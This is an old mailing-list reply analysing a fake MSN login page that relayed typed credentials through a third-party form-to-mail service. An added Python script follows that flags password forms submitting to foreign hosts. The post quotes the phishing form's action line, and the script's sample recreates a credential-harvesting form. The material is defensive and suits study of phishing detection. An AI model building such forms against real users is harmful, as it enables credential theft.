From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: MSN fake login website

w g <xillwillx@...oo.com> wrote:

> i put in my username and password ...

Your real username and password somewhere?

That was a bit silly, no?

> ... and nothing happened...i think
> its broken .. 

"nothing"??

When I tried it (with bogus data) I was told by the nice folk at
http://www.response-o-matic.com/ that:

   Service blocked due to spam or other abuse

   It's unfortunate that a few people choose to abuse FREE services 
   like our Response-O-Matic. The reality is that this sort of abuse 
   costs us tons of money and resources, which is one reason why we 
   need to carry advertising. You can do your part in the fight 
   against spam by responding to our advertisers' offers, like the 
   one below:

   <<snips ads, etc...>>

However, saving the page locally, changing the "your_email_address" 
field in the form to my own, loading this changed page, filling in 
the login form (with bogus data) and submitting it, it seemed to 
"work" OK (insofar as I claim to understand the service offered by 
the Response-O-Matic folk).

Thus, I concluded that the Response-O-Matic folk have also received 
complaints about this spam (?) and acted more quickly than the Yahoo! 
GeoCities abuse folk, specifically blocking normal processing of 
their rom.pl CGI used by the fake form on the fake page:

   form name="passwordform"
   action="http://www.response-o-matic.com/cgi-bin/rom.pl"

_if_ it is submitted with the "your_email_address" field set to that 
used by the bogus MSN8 signup page.  That is, Response-O-Matic no 
longer Email the data from the submission of that form to 
dna_cta@...oo.com...

> ...  i should mail microsoft and tell them about the bug 

"bug"??  What bug?

I hardly see the possibility that some users are so dense as to 
mistake a GeoCities page for a valid MSN login page as a bug or as 
something Microsoft can do anything useful about...  The Yahoo! 
and/or GeoCities abuse@... addresses, and in this case also that of
Response-O-Matic (though they've apparently already acted on this, so 
perhaps save them the extra grief for now...) are the places to get 
useful action on this incident.


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854
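
An added example, not part of the original post: a defender-side check for the pattern the message describes, a login form whose action submits to a third-party host and whose hidden field names a mail recipient. The page URL, recipient address and input names other than "your_email_address" are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class FormCollector(HTMLParser):
    """Record every <form> with its action and the attributes of its inputs."""
    def __init__(self):
        super().__init__()
        self.forms, self._cur = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            self._cur["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def audit(page_url, html):
    """Flag forms that ask for a password but submit to a different host."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in collector.forms:
        target = urlparse(urljoin(page_url, form["action"])).hostname
        types = [i.get("type", "").lower() for i in form["inputs"]]
        if "password" not in types or target == page_host:
            continue
        # A hidden field holding an e-mail address points to a form-to-mail relay.
        mail = {i.get("name", ""): i["value"] for i in form["inputs"]
                if i.get("type", "").lower() == "hidden" and "@" in i.get("value", "")}
        findings.append({"posts_to": target, "mail_fields": mail})
    return findings

# Constructed sample: only the form name, action and "your_email_address" field
# name come from the post; host, recipient and other field names are placeholders.
PAGE_URL = "http://hosting.example/msn8/login.html"
SAMPLE = """
<form name="passwordform" action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="post">
  <input type="hidden" name="your_email_address" value="collector@mail.example">
  <input type="text" name="login"> <input type="password" name="passwd">
  <input type="submit" value="Sign In">
</form>
"""

if __name__ == "__main__":
    print(audit(PAGE_URL, SAMPLE))
```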
